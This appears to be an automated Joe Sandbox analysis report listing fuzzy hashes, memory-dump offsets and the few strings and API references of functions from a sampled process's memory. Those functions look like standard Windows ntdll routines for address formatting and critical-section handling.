Opcode Fuzzy Hash: 2f485e3785c686089e70856ec49ddb99986a517e1b2f8a12f6fd4b1123d499e4
Instruction Fuzzy Hash: 8990023120140803D20475984C04687000997D0301F55C011AA024755FD6A589D17231

Function 01632AF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d94efff5cb249474b4fc24a04c4a2b2a77b173f2bd6204579e6a496e4aa9ad5
Instruction ID: 551886ba59aed7db7ad99c20b2c713e275151a2fe76a4d3e459b530eafaa1b38
Opcode Fuzzy Hash: 1d94efff5cb249474b4fc24a04c4a2b2a77b173f2bd6204579e6a496e4aa9ad5
Instruction Fuzzy Hash: 91900225221400030245B9980A0450B0449A7D6351395C015F5416690DC66189A55321

Function 01632AD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c7c7dee90a6aeddcc7c6697ea7e3823b87acf5b562ad1df199e918a20149e60
Instruction ID: 5bf0eab13964d9797bf7fa2a4fc91c001bb075b06433de337417dced4d3b647d
Opcode Fuzzy Hash: 8c7c7dee90a6aeddcc7c6697ea7e3823b87acf5b562ad1df199e918a20149e60
Instruction Fuzzy Hash: 0F900225211400030205B9980B04507004A97D5351355C021F5015650DD66189A15221

Function 01632AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94e6853699b66b3f75c445e653bd45171eb20926946d8338dc036a27d9b99350
Instruction ID: 3c07f30960ed5b3685585cb90d472d908fca3e300fe2117e30e910816753af2e
Opcode Fuzzy Hash: 94e6853699b66b3f75c445e653bd45171eb20926946d8338dc036a27d9b99350
Instruction Fuzzy Hash: 889002A1201540934600B6988804B0B450997E0201B55C016E5054660DC56589919235

Function 01632D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7040fe7e86e8ece2ab3fd4bf0ded361fb640eb6ebaab8af703964144fc1a8fea
Instruction ID: 6f93c167cdeb4d18de71683d14d11a3c034baf6b3c0e105c21f84693cb9f93b3
Opcode Fuzzy Hash: 7040fe7e86e8ece2ab3fd4bf0ded361fb640eb6ebaab8af703964144fc1a8fea
Instruction Fuzzy Hash: B990022130140003D240759858186074009E7E1301F55D011E4414654DD95589965322

Function 01632D00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ad9f6ff416f655662baa0a3873a5f9d4a7b70901432b8d724ba524d905eb7a3
Instruction ID: d6342a07ad4ea84a9da1b37631a885d149dbcbffce19c19e46e73668990b02af
Opcode Fuzzy Hash: 3ad9f6ff416f655662baa0a3873a5f9d4a7b70901432b8d724ba524d905eb7a3
Instruction Fuzzy Hash: EF90022120544443D20079985808A07000997D0205F55D011A5064695EC6758991A231

Function 01632D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a9c0f14c7fb39afc4d1bc32c110f648273636f16b97b75368e4e59119a7740a
Instruction ID: b3ff2dda87287224548235b228809dc38cce4815668179f7fedc34443ee513c9
Opcode Fuzzy Hash: 0a9c0f14c7fb39afc4d1bc32c110f648273636f16b97b75368e4e59119a7740a
Instruction Fuzzy Hash: 0090022921340003D2807598580860B000997D1202F95D415A4015658DC95589A95321

Function 01632DD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8c9e7314d3386c1a0f8ccb148df5166ae99316d7ab7a7a78ea696364fc60e90
Instruction ID: ac91e8943fb8b65faeae9c928bac552b55ddf8c3a1f1f0798ab77bee1ae07636
Opcode Fuzzy Hash: d8c9e7314d3386c1a0f8ccb148df5166ae99316d7ab7a7a78ea696364fc60e90
Instruction Fuzzy Hash: 28900221242441535645B5984804507400AA7E0241795C012A5414A50DC5669996D721

Function 01632DB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b109344f6ce20664a6e6d2566d3a5ee6bf205fe874d83d4c00112852258eac9c
Instruction ID: cdf9de333b13eb53fe68227faa192de4c74e55c808cc058357056f1e70dcdbec
Opcode Fuzzy Hash: b109344f6ce20664a6e6d2566d3a5ee6bf205fe874d83d4c00112852258eac9c
Instruction Fuzzy Hash: 4290023124140403D24175984804607000DA7D0241F95C012A4424654FC6958B96AB61

Function 01632C60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1107f41cd6bf05f979258dc6d475ec190b594d9c5773785008a539c29474335b
Instruction ID: 5821191b8495e46c9e238c26e3d58bff016c5120ae9d6598928d5308ac248ee0
Opcode Fuzzy Hash: 1107f41cd6bf05f979258dc6d475ec190b594d9c5773785008a539c29474335b
Instruction Fuzzy Hash: 8590023120140843D20075984804B47000997E0301F55C016A4124754EC655C9917621

Function 01632CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b46c97acbb8084a1400930484f3286789848854c1686fe716759467499351a2
Instruction ID: a02927d657ebf94f98b260c3983b13ba2f3c40f5bd60d2bc5f97f3379e780be4
Opcode Fuzzy Hash: 4b46c97acbb8084a1400930484f3286789848854c1686fe716759467499351a2
Instruction Fuzzy Hash: CB90023120140403D20075985908707000997D0201F55D411A4424658ED69689916221

Function 01632CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c622b9aa54641d511d6e0f3d6e5f55369a82d95b27ff747a638a91aa685c186
Instruction ID: f214570ddad6754f0d6981e5b62defe30fbd3c90591477f8ca84dbea808fdc4c
Opcode Fuzzy Hash: 8c622b9aa54641d511d6e0f3d6e5f55369a82d95b27ff747a638a91aa685c186
Instruction Fuzzy Hash: E990022160540403D24075985818707001997D0201F55D011A4024654EC6998B9567A1

Function 01632CA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6348e730e07df253665417cffc0bde6082dd6e54309f8d8a2b148fc05a6783ae
Instruction ID: aaba3b338c7dd59ef2c29c8cd25a6a6f1226caab31742bf51eeb3f1ac822c676
Opcode Fuzzy Hash: 6348e730e07df253665417cffc0bde6082dd6e54309f8d8a2b148fc05a6783ae
Instruction Fuzzy Hash: A690023120140403D20079D85808647000997E0301F55D011A9024655FC6A589D16231

Function 01632F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13170401b66a8e8b144fe7b222b247d1597939f3f1ffdcef15955105969d8fcb
Instruction ID: bb522e57712bacf902178d03812265b70a313c569ac29bc21829038f92987d21
Opcode Fuzzy Hash: 13170401b66a8e8b144fe7b222b247d1597939f3f1ffdcef15955105969d8fcb
Instruction Fuzzy Hash: A990026121140043D20475984804707004997E1201F55C012A6154654DC5698DA15225

Function 01632F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3b15ef49a9907a820746102769467e0e7577d9f70ec6385fee68dcaac08b37c
Instruction ID: e176393305b5167cb2282898917746ee58fe44a8b75da23e240260836c9f5794
Opcode Fuzzy Hash: b3b15ef49a9907a820746102769467e0e7577d9f70ec6385fee68dcaac08b37c
Instruction Fuzzy Hash: E890026134140443D20075984814B070009D7E1301F55C015E5064654EC659CD926226

Function 01632FE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81243c75bd76c381b7488f5b965815578150136720198b56dca97719adf0d795
Instruction ID: 2022d401c6fe1a04ba495bdf25ffea2251a7ffc1e756e1e3c8cea3a29148e4f9
Opcode Fuzzy Hash: 81243c75bd76c381b7488f5b965815578150136720198b56dca97719adf0d795
Instruction Fuzzy Hash: E8900221211C0043D30079A84C14B07000997D0303F55C115A4154654DC95589A15621

Function 01632FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de546757f577f715c92502881b81f119ebe7d942e0a9dd61a0e3325c3a86d290
Instruction ID: 293a965cc25d779a90d7b028b485ea69c525c1d0b1ca5bec5cbc21d063cd29bf
Opcode Fuzzy Hash: de546757f577f715c92502881b81f119ebe7d942e0a9dd61a0e3325c3a86d290
Instruction Fuzzy Hash: A590023120180403D20075984C08747000997D0302F55C011A9164655FC6A5C9D16631

Function 01632FB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31bc6a8b005d8c4f403b4a16e09bca50d15d5a01a396abbccb4dac341c49c459
Instruction ID: 0d58e5dd3be527d62270fc839466d05d48571e0e41e87d6374612298c12a0b0f
Opcode Fuzzy Hash: 31bc6a8b005d8c4f403b4a16e09bca50d15d5a01a396abbccb4dac341c49c459
Instruction Fuzzy Hash: 8D90022160140043424075A88C449074009BBE1211755C121A4998650EC59989A55765

Function 01632F90 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 180c3f2efc880720136cc6313ff617357b5b925a30391a99c7e8e79edf92cbb7
Instruction ID: 1cf34c78de0e86574b0a4c0ddd259ad632bc185607e1cb891f1b55209165ad7c
Opcode Fuzzy Hash: 180c3f2efc880720136cc6313ff617357b5b925a30391a99c7e8e79edf92cbb7
Instruction Fuzzy Hash: 3B90023120180403D20075984C1470B000997D0302F55C011A5164655EC66589916671

Function 01632E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91be4c502fddfe463e85aaf2bfa22697a69f4f1dc83ace71bdfefb738ab31cf7
Instruction ID: baee61bc31a30ac06ecfaa5b9a081fd939531997646970fad7b972fe02a37c93
Opcode Fuzzy Hash: 91be4c502fddfe463e85aaf2bfa22697a69f4f1dc83ace71bdfefb738ab31cf7
Instruction Fuzzy Hash: 9490022130140403D20275984814607000DD7D1345F95C012E5424655EC6658A93A232

Function 01632EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adf11dec5f5683f33fcf1d1eb5b9d90deff316bc14f6f1b49840fab97fde9293
Instruction ID: 1c9a989395d96bd811c7463df5a8c3feef4753749f2fe0ced79f8105ee7b7709
Opcode Fuzzy Hash: adf11dec5f5683f33fcf1d1eb5b9d90deff316bc14f6f1b49840fab97fde9293
Instruction Fuzzy Hash: 2B90026120180403D24079984C04607000997D0302F55C011A6064655FCA698D916235

Function 01632EA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a68e555f3d2d40c1650b5c984fed6acf5911eaca1ccd55a626425e4cde67e0c7
Instruction ID: bce0014fdeb21f380369054e4ebcd4059bb52e53038bd7f036660dd4ad2fd068
Opcode Fuzzy Hash: a68e555f3d2d40c1650b5c984fed6acf5911eaca1ccd55a626425e4cde67e0c7
Instruction Fuzzy Hash: C590027120140403D24075984804747000997D0301F55C011A9064654FC6998ED56765

Function 01632E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72a4dc8c567956e8b2145a8fee632e482502465bc31bcefa25a207b9abbfd4b2
Instruction ID: 40e16493a836827b6e73b4efdb8a9f0e598f132e0bc5c410725e6bbf25a12b7c
Opcode Fuzzy Hash: 72a4dc8c567956e8b2145a8fee632e482502465bc31bcefa25a207b9abbfd4b2
Instruction Fuzzy Hash: 3690022160140503D20175984804617000E97D0241F95C022A5024655FCA658AD2A231

Function 01633010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33f736f4c16fdc5ec383729404d14418376301faee2cb2d500fe865ed06e17a0
Instruction ID: e866cb9a57633fc2524049880c0028808bd7403216bcbab6506356d1b09290bb
Opcode Fuzzy Hash: 33f736f4c16fdc5ec383729404d14418376301faee2cb2d500fe865ed06e17a0
Instruction Fuzzy Hash: 0990022120184443D24076984C04B0F410997E1202F95C019A8156654DC95589955721

Function 01633090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da1e634a720ea87814d21c8f0dd8fbf5e7d775c678ce168f4b2779608f25c036
Instruction ID: ee3fe9ac836e79a3e36ad746def9e54b74cf6196591e8c0c344c4cf834c10175
Opcode Fuzzy Hash: da1e634a720ea87814d21c8f0dd8fbf5e7d775c678ce168f4b2779608f25c036
Instruction Fuzzy Hash: 8190022124140803D24075988814707000AD7D0601F55C011A4024654EC6568AA567B1

Function 016339B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52daeb13def63f10326cb494990f68ec4bd1d53a38459b8c4d7298fed5fbfa9f
Instruction ID: b36b04278b39c1d1c21e6b75f08c4c4a17e818c67b1499fada5f41c288ef3517
Opcode Fuzzy Hash: 52daeb13def63f10326cb494990f68ec4bd1d53a38459b8c4d7298fed5fbfa9f
Instruction Fuzzy Hash: 7990022124545103D250759C48046174009B7E0201F55C021A4814694EC59589956321

Function 01633D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a1f201a060dba058de1b05b485486079e452bf96b3f9b76ee50884468fc74b
Instruction ID: 924b1e8051600a913969dffb311fcecd2f6e3457a3ff636b75396be6b0b3617b
Opcode Fuzzy Hash: 01a1f201a060dba058de1b05b485486079e452bf96b3f9b76ee50884468fc74b
Instruction Fuzzy Hash: EC90023520140403D61075985C04647004A97D0301F55D411A4424658EC69489E1A221

Function 01633D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a6ee9652aa7bdb6038868273b37ef4198f75817bbf4920b8d5bd3d79ad72700
Instruction ID: f250ac042369eec8895ff9f61c1ec424d16ec13fa5f55da4a26b40dac09cd760
Opcode Fuzzy Hash: 9a6ee9652aa7bdb6038868273b37ef4198f75817bbf4920b8d5bd3d79ad72700
Instruction Fuzzy Hash: 6B90023120240143964076985C04A4F410997E1302B95D415A4015654DC95489A15321

Function 01632C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 5aad6a5a0420ab2d68b7750ed78af570640d08ea2e24e835ce1487a5eb418be2
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 01632890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0163293C
___swprintf_l.LIBCMT ref: 0163295E
___swprintf_l.LIBCMT ref: 016329A3
___swprintf_l.LIBCMT ref: 0166A52E

Strings

ffff:, xrefs: 0166A504
::%hs%u.%u.%u.%u, xrefs: 0166A527
:%u.%u.%u.%u, xrefs: 0166A5B8
::ffff:0:%u.%u.%u.%u, xrefs: 0166A54E

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 1aba9ae6aa5d2e964878af58bd76a771ab25f1aab71566aba6e19fc8ce2c930f
Instruction ID: 0aaa880ee2cde90e4d1255e709a52822cc796580fb53525df5decce7bc9cba8e
Opcode Fuzzy Hash: 1aba9ae6aa5d2e964878af58bd76a771ab25f1aab71566aba6e19fc8ce2c930f
Instruction Fuzzy Hash: BD51D4B6A00116BFCB11DF9D8CA097EFBB8BB88640714826DE5A5D7641E334DE45CBA0

Function 016A2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 016A24A6
___swprintf_l.LIBCMT ref: 016A24E2
___swprintf_l.LIBCMT ref: 016A257D
___swprintf_l.LIBCMT ref: 016A25A3
___swprintf_l.LIBCMT ref: 016A25C8
___swprintf_l.LIBCMT ref: 016A2608

Strings

ffff:, xrefs: 016A247D, 016A249D
::%hs%u.%u.%u.%u, xrefs: 016A249E
::ffff:0:%u.%u.%u.%u, xrefs: 016A24DA
:%u.%u.%u.%u, xrefs: 016A25FF

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: b0a76a678effabc4bdc199ff0c94146e83a330c7e45ef3674ca26f2150e9905e
Instruction ID: 32d928c04fddae72433cdbfed9678f507b985808c9ee93ba6f2ec69e28fae5a6
Opcode Fuzzy Hash: b0a76a678effabc4bdc199ff0c94146e83a330c7e45ef3674ca26f2150e9905e
Instruction Fuzzy Hash: D1510371A44656AFCB24DF9CCCA09BEBBF9FB44200B84846DE5D6C7641E774EE408B60

Function 01627630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01664725
CLIENT(ntdll): Processing section info %ws..., xrefs: 01664787
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01664742
Execute=1, xrefs: 01664713
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 016646FC
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01664655
ExecuteOptions, xrefs: 016646A0

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 1eae1e115fcbd6360824e018cb238b311cffd89ee5ed241d228e68568a587804
Instruction ID: e1f539a78930d9cbac98efe2f206c7482650624d3d857c0f6ee7f41b691cfcb2
Opcode Fuzzy Hash: 1eae1e115fcbd6360824e018cb238b311cffd89ee5ed241d228e68568a587804
Instruction Fuzzy Hash: 89511A3160062A7AEF31EBA8DC85FB977A9FF24300F14009DD605AB2D1DB719E458F54

Function 0163B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0163B6BF

Strings

0, xrefs: 0163B66F
0, xrefs: 0163B695
-, xrefs: 0163B650
+, xrefs: 0163B65A

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction ID: 57ce6e47105ae8660f22394bbea31dfcd0d49ecd0da16cccd044ea324f930c6f
Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction Fuzzy Hash: C081A070E052599EEF268E6CCC917FEBBB2EFC6320F1C415AD861A7392C73498418B55

Function 016A20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 016A214F
___swprintf_l.LIBCMT ref: 016A2172

Strings

%%%u, xrefs: 016A2146
]:%u, xrefs: 016A2169
[, xrefs: 016A212B

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 7c4de682173f3635c1bf7b3e71eee7e34ee58eef108d0aa025003527302614df
Instruction ID: 5d18a6da724fa743b90d149e15edfd3fbf3e15f23237b374f76cb41211856a8d
Opcode Fuzzy Hash: 7c4de682173f3635c1bf7b3e71eee7e34ee58eef108d0aa025003527302614df
Instruction Fuzzy Hash: 8821657AE00119ABDB10DF79CC50AEEBBF9EF54641F44011EEA05D3240E730EE158BA1

Function 0161F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016602BD
RTL: Re-Waiting, xrefs: 0166031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016602E7

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 1238f97cad941b574920752632f3ba4d9f2fc6b5c39bbe52e5a50ec3a4f8550f
Instruction ID: ae48281a2d15bf3bf2e3a1143695dc3c2fe19a60ca7e830a7c15e4f786b8f1d7
